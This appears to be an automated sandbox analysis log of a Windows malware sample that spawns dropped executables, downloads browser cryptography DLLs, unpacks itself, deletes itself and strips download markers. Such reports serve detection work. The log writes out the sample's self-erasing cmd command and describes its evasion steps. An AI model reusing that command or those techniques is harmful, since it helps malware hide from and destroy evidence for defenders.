Source: kat2225.tmp, 00000009.00000002.3193725371.000000001DDCB000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3192309676.000000001B988000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.9.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: 3.exe Virustotal: Detection: 47%
Source: unknown Process created: C:\Users\user\Desktop\3.exe "C:\Users\user\Desktop\3.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\rcjjrra C:\Users\user\AppData\Roaming\rcjjrra
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\A247.exe C:\Users\user\AppData\Local\Temp\A247.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\5358.exe C:\Users\user\AppData\Local\Temp\5358.exe
Source: C:\Users\user\AppData\Local\Temp\5358.exe Process created: C:\Users\user\AppData\Local\Temp\kat2225.tmp C:\Users\user\AppData\Local\Temp\kat2225.tmp
Source: C:\Users\user\AppData\Local\Temp\A247.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6204 -s 1548
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\kat2225.tmp" & rd /s /q "C:\ProgramData\DGHIECGCBKFH" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\A247.exe C:\Users\user\AppData\Local\Temp\A247.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\5358.exe C:\Users\user\AppData\Local\Temp\5358.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5358.exe Process created: C:\Users\user\AppData\Local\Temp\kat2225.tmp C:\Users\user\AppData\Local\Temp\kat2225.tmp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\kat2225.tmp" & rd /s /q "C:\ProgramData\DGHIECGCBKFH" & exit Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\3.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\3.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\Desktop\3.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.cloudstore.schema.shell.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: mfsrcsnk.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\rcjjrra Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\rcjjrra Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\rcjjrra Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5358.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5358.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5358.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5358.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5358.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: dbghelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: sxs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: ntshrui.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: linkinfo.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: dlnashext.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: wpdshext.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\3.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: 3.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: mozglue.pdbP source: kat2225.tmp, 00000009.00000002.3206547696.000000006F8FD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.9.dr, mozglue.dll.9.dr
Source: Binary string: freebl3.pdb source: freebl3.dll.9.dr
Source: Binary string: freebl3.pdbp source: freebl3.dll.9.dr
Source: Binary string: nss3.pdb@ source: kat2225.tmp, 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.9.dr, nss3[1].dll.9.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.9.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.9.dr, vcruntime140.dll.9.dr
Source: Binary string: nss3.pdb source: kat2225.tmp, 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.9.dr, nss3[1].dll.9.dr
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: kat2225.tmp, 00000009.00000002.3193725371.000000001DDCB000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3192309676.000000001B988000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr
Source: Binary string: mozglue.pdb source: kat2225.tmp, 00000009.00000002.3206547696.000000006F8FD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.9.dr, mozglue.dll.9.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.9.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\3.exe Unpacked PE file: 0.2.3.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\A247.exe Unpacked PE file: 5.2.A247.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\A247.exe Unpacked PE file: 5.2.A247.exe.400000.0.unpack
PE file contains sections with non-standard names
Source: sqls[1].dll.9.dr Static PE information: section name: .00cfg
Source: freebl3.dll.9.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.9.dr Static PE information: section name: .00cfg
Source: mozglue.dll.9.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.9.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.9.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.9.dr Static PE information: section name: .didat
Source: nss3.dll.9.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.9.dr Static PE information: section name: .00cfg
Source: softokn3.dll.9.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.9.dr Static PE information: section name: .00cfg
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\3.exe Code function: 0_2_00402CD7 push cs; retf 0_2_00402CD8
Source: C:\Users\user\Desktop\3.exe Code function: 0_2_00401EA7 push 0000000Eh; retf 0038h 0_2_00401EB6
Source: C:\Users\user\Desktop\3.exe Code function: 0_2_004033B6 push eax; ret 0_2_00403419
Source: C:\Users\user\Desktop\3.exe Code function: 0_2_02D5499B push cs; retf 0_2_02D5499C
Source: C:\Users\user\Desktop\3.exe Code function: 0_2_02D53986 push ss; iretw 0_2_02D53998
Source: C:\Users\user\Desktop\3.exe Code function: 0_2_02D53DB9 push cs; retf 0038h 0_2_02D53E38
Source: C:\Users\user\Desktop\3.exe Code function: 0_2_02D59E65 push 0000002Ah; iretd 0_2_02D59EAF
Source: C:\Users\user\Desktop\3.exe Code function: 0_2_02D60B01 push esi; ret 0_2_02D60C91
Source: C:\Users\user\Desktop\3.exe Code function: 0_2_02D5500F push eax; ret 0_2_02D55010
Source: C:\Users\user\Desktop\3.exe Code function: 0_2_02D53E29 push 0000000Eh; retf 0038h 0_2_02D53E38
Source: C:\Users\user\Desktop\3.exe Code function: 0_2_02E42D3E push cs; retf 0_2_02E42D3F
Source: C:\Users\user\Desktop\3.exe Code function: 0_2_02E41F0E push 0000000Eh; retf 0038h 0_2_02E41F1D
Source: C:\Users\user\AppData\Roaming\rcjjrra Code function: 4_2_00402CD7 push cs; retf 4_2_00402CD8
Source: C:\Users\user\AppData\Roaming\rcjjrra Code function: 4_2_00401EA7 push 0000000Eh; retf 0038h 4_2_00401EB6
Source: C:\Users\user\AppData\Roaming\rcjjrra Code function: 4_2_004033B6 push eax; ret 4_2_00403419
Source: C:\Users\user\AppData\Roaming\rcjjrra Code function: 4_2_02E22D3E push cs; retf 4_2_02E22D3F
Source: C:\Users\user\AppData\Roaming\rcjjrra Code function: 4_2_02E21F0E push 0000000Eh; retf 0038h 4_2_02E21F1D
Source: C:\Users\user\AppData\Roaming\rcjjrra Code function: 4_2_02EB40EF push eax; ret 4_2_02EB40F0
Source: C:\Users\user\AppData\Roaming\rcjjrra Code function: 4_2_02EB2E99 push cs; retf 0038h 4_2_02EB2F18
Source: C:\Users\user\AppData\Roaming\rcjjrra Code function: 4_2_02EB2A66 push ss; iretw 4_2_02EB2A78
Source: C:\Users\user\AppData\Roaming\rcjjrra Code function: 4_2_02EB3A7B push cs; retf 4_2_02EB3A7C
Source: C:\Users\user\AppData\Roaming\rcjjrra Code function: 4_2_02EB8F45 push 0000002Ah; iretd 4_2_02EB8F8F
Source: C:\Users\user\AppData\Roaming\rcjjrra Code function: 4_2_02EB2F09 push 0000000Eh; retf 0038h 4_2_02EB2F18
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_0063030D push ecx; ret 5_2_00630315
Source: C:\Users\user\AppData\Local\Temp\5358.exe Code function: 8_2_043BB010 push edx; ret 8_2_043BB21F
Source: C:\Users\user\AppData\Local\Temp\5358.exe Code function: 8_2_043BA910 push edx; ret 8_2_043BA91B
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File created: C:\ProgramData\DGHIECGCBKFH\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File created: C:\ProgramData\DGHIECGCBKFH\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File created: C:\ProgramData\DGHIECGCBKFH\softokn3.dll Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\A247.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File created: C:\ProgramData\DGHIECGCBKFH\msvcp140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File created: C:\ProgramData\DGHIECGCBKFH\mozglue.dll Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\5358.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\rcjjrra Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File created: C:\ProgramData\DGHIECGCBKFH\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\5358.exe File created: C:\Users\user\AppData\Local\Temp\kat2225.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\sqls[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\vcruntime140[1].dll Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File created: C:\ProgramData\DGHIECGCBKFH\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File created: C:\ProgramData\DGHIECGCBKFH\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File created: C:\ProgramData\DGHIECGCBKFH\softokn3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File created: C:\ProgramData\DGHIECGCBKFH\msvcp140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File created: C:\ProgramData\DGHIECGCBKFH\mozglue.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File created: C:\ProgramData\DGHIECGCBKFH\vcruntime140.dll Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\rcjjrra Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Deletes itself after installation
Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\3.exe Jump to behavior
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\rcjjrra:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5358.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5358.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
